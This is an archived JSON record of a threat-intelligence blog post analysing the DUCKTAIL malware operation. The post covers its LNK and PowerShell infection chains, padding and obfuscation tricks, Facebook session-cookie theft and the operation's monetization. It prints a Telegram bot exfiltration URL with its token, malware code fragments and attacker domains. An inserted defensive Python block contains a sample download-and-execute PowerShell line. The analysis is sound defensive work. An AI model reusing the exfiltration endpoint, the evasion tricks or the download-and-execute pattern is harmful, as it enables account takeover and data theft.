{
	"id": "f5fe1567-49c7-44de-9123-3c22e44433ba",
	"created_at": "2026-04-06T00:10:05.996214Z",
	"updated_at": "2026-04-10T03:21:29.619794Z",
	"deleted_at": null,
	"sha1_hash": "f01a2b3e625b88918ef39df54697e4b6d231c5b2",
	"title": "DUCKTAIL: Threat Operation Re-emerges with New LNK, PowerShell, and Other Custom Tactics to Avoid Detection | Deep Instinct",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3686089,
	"plain_text": "DUCKTAIL: Threat Operation Re-emerges with New LNK, PowerShell,\r\nand Other Custom Tactics to Avoid Detection | Deep Instinct\r\nBy Simon Kenin, Threat Intelligence Researcher, Deep Instinct Threat Lab\r\nPublished: 2023-03-09 · Archived: 2026-04-05 20:24:42 UTC\r\nDUCKTAIL is the name given to a malware operation that was previously focused on targeting individuals and\r\norganizations that operate on Facebook’s Business Ads platform.\r\nThe initial infection starts with a malicious LNK that executes PowerShell to download malware hosted on a public\r\nfile-sharing service.\r\nThe DUCKTAIL operation has changed their custom malware to be compiled as a .NET Core 5 binary.\r\nThe final payload was changed from custom-made malware to commodity malware during the experimental\r\nphase.\r\nWithSecure reported on the DUCKTAIL operation in two separate reports in 2022 (1, 2).\r\nShortly after the first publication, which carefully detailed their TTPs, the threat operation went silent.\r\nAfter the second publication revealed their tactics again, they again went silent. 
It was at this time that Deep Instinct\r\nobserved the operation experimenting with changing the initial infection from an archive containing a malicious executable\r\nto an archive containing a malicious LNK file that would start the infection chain (we’ll describe this below).\r\nDeep Instinct observed the operation becoming active again at the beginning of February 2023.\r\nInitial Experiments Observed by Deep Instinct\r\nIn October 2022 the DUCKTAIL operation was observed by the Threat Research team at Deep Instinct pushing their custom\r\n.NET malware in their usual infection chain, as was described by WithSecure in the previously mentioned reports.\r\nThe payload with the hash 27c76c08e4d3a17056e0d22cbe1f6e59 was signed by a now-revoked certificate for a fake\r\nbusiness created by the threat actor:\r\nFigure 1: Signed DUCKTAIL malware with now-revoked certificate.\r\nThe payload was inside an archive (870dc03ba3120e4ecfb799b519ec1a50) with decoy images and videos:\r\nhttps://www.deepinstinct.com/blog/ducktail-threat-operation-re-emerges-with-new-lnk-powershell-and-other-custom-tactics-to-avoid-detection\r\nPage 1 of 9\n\nFigure 2: Directory tree inside the archive file containing malware and decoy files.\r\nAs described by WithSecure, the malware exfiltrated data via a Telegram bot, in this case via an HTTP request to:\r\nhxxps://api.telegram.org/bot5448616453:AAHJdBSZdnpmhl5_xYzf0uL-clkJzggXCSw/sendMessage\r\nThe exact same payload was observed in parallel in another infection chain that Deep Instinct determined was used for\r\ntesting purposes to bypass detections and improve the number of successful infections.\r\nWhile the final payload is the same, the new alternative infection chain began with an archive\r\n(ece3728e2893c9dd70fb519ac80070b6) containing only an LNK file without any decoy files.\r\nThe LNK file calls PowerShell to download and execute another PowerShell script which is hosted on Discord:\r\nFigure 3: LNK file contents.\r\nThe 
PowerShell command inside the LNK is lightly obfuscated using simple tricks like adding quotes, concatenation, and\r\nstring replace, which are intended to bypass static detections.\r\nThe downloaded 2nd-stage PowerShell (238fbb5ac0af956e8d07cf0f716e0d83) is also lightly obfuscated using the same\r\nreplace trick plus a custom function for download and execution, which should bypass some static detections.\r\nWhen executed, the 2nd-stage PowerShell downloads the exact same signed payload\r\n(27c76c08e4d3a17056e0d22cbe1f6e59) which was observed in the old infection chain. Additionally, a benign archive\r\nfile with decoy files is also downloaded. Both files are hosted on Discord. Finally, the 2nd-stage PowerShell deletes the\r\ninitial LNK file to cover its tracks:\r\nFigure 4: 2nd-stage PowerShell script contents.\r\nDeep Instinct Observes More DUCKTAIL Experiments:\r\nFrom November to December 2022 the DUCKTAIL operation seemed to have switched solely to the LNK infection chain\r\nwhile continuing to experiment with it. We observed the following experiments:\r\nInflation of LNK files:\r\nThe LNK file (5da77aeb1d6ec4d7c9b8408cab3feecc) has a size of almost 300 MB.\r\nWhile the functionality is the same as the previous LNK file, this file has null (0x00) bytes appended to it. 
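The padding and the light obfuscation just described can both be triaged from the analyst's side with a few lines of Python. The block below is an added example written for this page, not code from Deep Instinct and not taken from the DUCKTAIL samples: it flags a shortcut whose bulk is trailing 0x00 bytes, and it folds the inserted quotes, the string concatenation and the .replace() trick back into plain literals, also resolving the $PSHOME[n] character-indexing variant that this section describes further on. The size and ratio thresholds, the fake LNK bytes, the obfuscated command line and the example.invalid URL are constructed for the demonstration and are not indicators from the post.

```python
# Added example (not from the Deep Instinct post): analyst-side checks for the two
# LNK tricks described in this section, exercised on constructed input.
import re

DQ = chr(34)   # double-quote character, kept out of the source text
SQ = chr(39)   # single-quote character
BS = chr(92)   # backslash
# Value of $PSHOME as the post shows it (WINDOWS in upper case). On a host where the
# directory is spelled Windows, $PSHOME[4] is a lower-case i instead; iex still works.
PSHOME = BS.join(['C:', 'WINDOWS', 'System32', 'WindowsPowerShell', 'v1.0'])


# --- 1. Null-byte inflation (T1027.001 Binary Padding) -------------------------

def trailing_null_ratio(data: bytes) -> float:
    '''Fraction of the file made up of trailing 0x00 bytes (bytes(1) is one NUL).'''
    if not data:
        return 0.0
    return (len(data) - len(data.rstrip(bytes(1)))) / len(data)

def is_inflated(data: bytes, min_size: int = 1_000_000, min_ratio: float = 0.9) -> bool:
    '''Flag a shortcut that is mostly padding. Both thresholds are assumptions, not the post's.'''
    return len(data) >= min_size and trailing_null_ratio(data) >= min_ratio

# Constructed stand-in for an inflated LNK: 256 header-like bytes followed by 2 MiB of
# zeros. A real LNK starts with header size 0x4C and the ShellLink CLSID; the check
# only looks at the tail, so the header content does not matter here.
FAKE_LNK = bytes(range(256)) + bytes(2 * 1024 * 1024)


# --- 2. Lightly obfuscated PowerShell: quotes, concatenation, .replace(), $PSHOME[n] ---

# A quoted literal in either quote style (these loaders use no escapes inside quotes).
LIT = f'(?:{DQ}([^{DQ}]*){DQ}|{SQ}([^{SQ}]*){SQ})'
PSHOME_IDX = re.compile('[$]PSHOME[[]([0-9]+)[]]', re.IGNORECASE)
CONCAT = re.compile(LIT + '[ ]*[+][ ]*' + LIT)
REPLACE = re.compile('[(]?' + LIT + '[)]?[.]replace[(]' + LIT + '[ ]*,[ ]*' + LIT + '[)]',
                     re.IGNORECASE)

def _lit(m, i):
    '''Text of a quoted literal in a match: group i (double quotes) or i+1 (single quotes).'''
    return m.group(i) if m.group(i) is not None else m.group(i + 1)

def deobfuscate(cmd: str) -> str:
    '''Fold the tricks until nothing changes; returns the command with plain literals.'''
    # $PSHOME[n] -> the n-th character of the path, as a quoted literal
    cmd = PSHOME_IDX.sub(lambda m: SQ + PSHOME[int(m.group(1))] + SQ, cmd)
    prev = None
    while prev != cmd:
        prev = cmd
        # 'ab' + 'cd' -> 'abcd', folded to a fixpoint first so that a .replace() after a
        # concatenated chain is applied to the whole joined literal (PowerShell precedence)
        folded = None
        while folded != cmd:
            folded = cmd
            cmd = CONCAT.sub(lambda m: SQ + _lit(m, 1) + _lit(m, 3) + SQ, cmd)
        # ('a#b').replace('#','') -> 'ab'; .NET String.Replace is case-sensitive, so no lower()
        cmd = REPLACE.sub(lambda m: SQ + _lit(m, 1).replace(_lit(m, 3), _lit(m, 5)) + SQ, cmd)
    return cmd

# Constructed sample in the style of the LNK argument described above; the URL is a
# placeholder, not an indicator from the post.
SAMPLE = '''($PSHOME[4]+$PSHOME[30]+'x') (('N#e#w-Ob'+'je#ct Ne'+'t.W#ebC'+'lient').replace('#','')).DownloadString('hxxps://example.invalid/stage2.ps1')'''

def main():
    print('inflated LNK:', is_inflated(FAKE_LNK), f'(null ratio {trailing_null_ratio(FAKE_LNK):.3f})')
    print('folded command:', deobfuscate(SAMPLE))

if __name__ == '__main__':
    main()
```

Run as a script it prints the inflation verdict and the folded command. For the constructed sample the folded form is ('Iex') ('New-Object Net.WebClient').DownloadString('hxxps://example.invalid/stage2.ps1'): positions 4 and 30 of $PSHOME spell I and e, so the expression evaluates to iex, the Invoke-Expression alias, without that string ever appearing in the LNK. The null-byte check is a triage heuristic and needs the size threshold, since a normal shortcut is a few kilobytes and is not zero-padded; the ratio alone would also flag tiny files that happen to end in a NUL.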
This technique is\r\ngrowing in popularity among threat actors because of file-size limits at various vendors and sandboxes.\r\nChange to initial PowerShell command inside LNK:\r\nThe initial PowerShell script inside the LNK files has been completely changed and now relies heavily on concatenation\r\ncombined with extracting single characters from the “$PSHOME” variable by index.\r\nThe “$PSHOME” in PowerShell translates to the directory where “powershell.exe” is located, for example\r\n“C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\.”\r\nBelow is an example of an extracted and edited version of a new LNK (e03635ef5c57b4884f619108499971e4):\r\nFigure 5: New PowerShell script with added analysis comments\r\nChanges to public hosting storage:\r\nAt first, the DUCKTAIL operation used Discord to host the next stages of the attack. At some point the operation shifted to\r\nother public storage providers such as “transfer.sh,” GitHub, and Google Drive.\r\nAdditionally, the use of dedicated attacker-controlled domains was observed (see appendix).\r\nOne such example is the domain “techhint24[.]com” which is shown in figure 5.\r\nPreviously, WithSecure observed archives with the malicious executable hosted at Dropbox, iCloud, and MediaFire. In\r\naddition, Deep Instinct observed the current archives with LNK files hosted at attacker-controlled domains and in free\r\nsubdomains that would redirect to Dropbox, such as status-refund-taxes[.]web[.]app, which was observed by\r\n@JAMESWT_MHT:\r\nFigure 6: Redirect to download file from Dropbox found at “status-refund-taxes[.]web[.]app”\r\nChanges to final payload:\r\nDuring the infection chain experiments the threat actor initially used their own custom .NET malware, but its certificate\r\nhad been revoked and its detection rate was growing. 
At some point the operation switched to different payloads.\r\nIn the example shown in figure 7, the payload was Doenerium stealer. In other instances, Vidar stealer was observed. This\r\nchange might indicate that the threat actor is exploring new ways to monetize their attacks.\r\nBack to Action – New wave of attack in February 2023:\r\nAfter the experiments at the end of 2022, there was no sign of new activity in 2023 until the middle of February.\r\nThe operation is back with an infection chain that combines all the features from the experiments, while the final payload is\r\nonce again the custom malware, signed with yet another new valid certificate:\r\nFigure 7: New certificate information.\r\nThe actor made an OpSec mistake and used an email address at cakoithaivuong[.]site, a domain that he had registered\r\nhimself.\r\nIn addition to the new LNK infection chain, the old infection chain consisting of archives containing malicious executables\r\nand decoy files is also active.\r\nIn this wave, the custom DUCKTAIL malware functionality remains the same but it is being distributed as a 64-bit .NET Core\r\n5 binary:\r\nFigure 8: Metadata of new DUCKTAIL binary showing it is a .NET Core 5 binary.\r\nIn case you missed the previous reports on DUCKTAIL, the purpose of the malware is to steal browser cookies and\r\nexfiltrate them through Telegram. If a Facebook session cookie is found, the malware checks if the Facebook account is a\r\nbusiness account. If it is, the malware tries to add the attacker’s email as an admin and finance editor.\r\nBelow is a scheme showing the new DUCKTAIL infection chain:\r\nFigure 9: Illustration of new DUCKTAIL infection chain\r\nAdditional Information:\r\nDelivery mechanism:\r\nWithSecure initially observed that individuals have been targeted via LinkedIn. 
During our research, we identified two\r\nthreads on Reddit (1, 2) which discuss a suspicious LNK file that is spread via a link to an archive hosted on Google Drive. The\r\nlink was added to various threads on Reddit, as can be seen in the archived version of one of those posts.\r\nMonetization:\r\nWhile WithSecure detailed the malware functionality, which specifically targets the Facebook Ads platform, there is a\r\nmissing piece on what the threat actor does once they gain access to business Facebook Ads accounts.\r\nWhile it might be possible to get the credit card information that is used to pay for ads in the compromised accounts, this\r\ndoesn’t seem plausible. There are far better, cheaper, and easier ways to obtain credit card information.\r\nOne of the initial samples (138831ebee49d667748c4babe5ea2445) was inside an archive\r\n(7e8f1c84347586e8b9b62d7493c6017c). This archive was hosted on the domain aicokgroup[.]com.\r\nWe have identified the following Facebook page that lists this domain as its homepage:\r\nFigure 10: Facebook page with aicokgroup[.]com\r\nOne of the posts has an Amazon short URL which is no longer active. An archived version shows that the link is for an AICOK\r\njuicer machine:\r\nFigure 11: Amazon item from link in Facebook group.\r\nWhile we are not sure whether AICOK is a real company or a shell company made by the threat actor, their items seem to be\r\n“white label” products. 
For example, the same juicer is now listed under another brand on Amazon:\r\nFigure 12: Amazon listing for same item but a different brand.\r\nOn the same Facebook page there is another post which is a job ad for a Facebook Ads Manager:\r\nFigure 13: Facebook post for Facebook Ads Manager.\r\nWhile investigating the AICOK lead, we came across another Facebook page which is related to AICOK with a nearly\r\nidentical post. The only difference is that this page had a different domain:\r\nFigure 14: Another Facebook post for Facebook Ads Manager. Comment mentions this is a virus.\r\nThe second domain, aicok[.]cc, no longer exists. However, there is a similar domain (aicook[.]cc) which redirects to\r\naicookhome[.]com. We have found another Facebook page which contains those domains:\r\nFigure 15: Facebook page of AICOOK\r\nThe page mentions that there were scams on Facebook for their brand “AICOOK,” while the DUCKTAIL Facebook pages\r\nare called “AICOK.”\r\nSince we have only identified one such instance, we can’t assess whether this is a one-time event or whether this is\r\nthe usual operational method of DUCKTAIL.\r\nThere are a couple of theories for what could be happening:\r\n1. Pure scam – AICOK was imitating AICOOK. DUCKTAIL would buy Ads for “AICOK” and unsuspecting victims\r\nwould order items and never receive them. In addition, the fake shop would look for Ad Managers while infecting\r\nthem with malware.\r\n2. Drop shipping / Affiliate program / White-label sale – AICOOK has an affiliate program. DUCKTAIL has pushed\r\nads from stolen Facebook Ads accounts to promote the sale of various items. 
As seen in figures 9 and 10, the AICOK\r\nitem price is much higher, although it is the same item. The reason for this could be that either they directly sold the\r\nwhite-label item from the factory as the AICOK brand mimicking AICOOK, or they did drop shipping for AICOOK\r\nitems, buying them at the original price and selling at a much higher price for profit. Or they simply acted as an affiliate and\r\ngained revenue from every item sold while maximizing the profit by pushing a lot of ads from compromised\r\nFacebook Ads accounts.\r\nMITRE ATT\u0026CK:\r\nTactic | Technique | Description | Observable\r\nDiscovery | T1057 Process Discovery | If there are fewer than 150 running processes the malware won’t execute. | bool flag = Process.GetProcesses().Count() \u003e 150;\r\nDiscovery | T1012 Query Registry | Malware tries to identify the default browser. | registryKey = Registry.LocalMachine.OpenSubKey(\"SOFTWARE\\\\Clients\\\\StartMenuInternet\");\r\nDiscovery | T1083 File and Directory Discovery | Malware tries to steal browser cookies from specific locations. | string text = Path.Combine(Environment.GetFolderPath(26), \"Mozilla\\\\Firefox\\\\Profiles\");\r\nDefense Evasion | T1622 Debugger Evasion | Malware checks if a debugger is present. | bool flag = DataChecker.DetectDebugger() || DataChecker.DetectSandboxie();\r\nDiscovery | T1016.001 System Network Configuration Discovery: Internet Connection Discovery | Malware tries to ping an IP address written in HEX format to check internet connectivity. | PingReply pingReply = ping.Send(text, num, array, pingOptions); Console.WriteLine(\"This environm\r\nDefense Evasion | T1027.001 Obfuscated Files or Information: Binary Padding | LNK files are artificially inflated to a size of ~300 MB. | 4bef9919457b22db15a8f40277c451973007547820fa7cd009ee9aa038f3cfd5\r\nExfiltration | T1567 Exfiltration Over Web Service | Malware uses the Telegram API to exfiltrate data. | hxxps://api.telegram.org/bot5448616453:AAHJdBSZdnpmhl5_xYzf0uL-clkJzggXCSw/sendMessage\r\nResource Development | T1587.001 Develop Capabilities: Malware | DUCKTAIL custom .NET malware. | 312e8a10903141991d4d3c4571b16fc4528b62a324ff4336daa56ac93292cb40\r\nResource Development | T1588.003 Obtain Capabilities: Code Signing Certificates | Threat actor created fake organizations and received certificates for them, which were used to sign the malware. | 312e8a10903141991d4d3c4571b16fc4528b62a324ff4336daa56ac93292cb40 signed by “CONG TY T\r\nInitial Access | T1566.002 Phishing: Spearphishing Link | Threat actor posted links to archives with malicious LNK files on Reddit. | https://web.archive.org/web/20221201234010/https:/www.reddit.com/r/BitcoinMining/comments/za1\r\nExecution | T1204.002 User Execution: Malicious File | DUCKTAIL custom .NET malware. | 312e8a10903141991d4d3c4571b16fc4528b62a324ff4336daa56ac93292cb40\r\nCredential Access | T1539 Steal Web Session Cookie | Malware steals cookies from local browsers. | bool flag2 = Directory.GetFiles(text2).Any((string a) =\u003e Path.GetFileName(a) == \"cookies.sqlite\");\r\nIOCs\r\nThe full list of IOCs can be found on our GitHub: https://github.com/deepinstinct/DuckTail_IOCs\r\nSource: 
https://www.deepinstinct.com/blog/ducktail-threat-operation-re-emerges-with-new-lnk-powershell-and-other-custom-tactics-to-avoid-detection",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.deepinstinct.com/blog/ducktail-threat-operation-re-emerges-with-new-lnk-powershell-and-other-custom-tactics-to-avoid-detection"
	],
	"report_names": [
		"ducktail-threat-operation-re-emerges-with-new-lnk-powershell-and-other-custom-tactics-to-avoid-detection"
	],
	"threat_actors": [],
	"ts_created_at": 1775434205,
	"ts_updated_at": 1775791289,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f01a2b3e625b88918ef39df54697e4b6d231c5b2.pdf",
		"text": "https://archive.orkl.eu/f01a2b3e625b88918ef39df54697e4b6d231c5b2.txt",
		"img": "https://archive.orkl.eu/f01a2b3e625b88918ef39df54697e4b6d231c5b2.jpg"
	}
}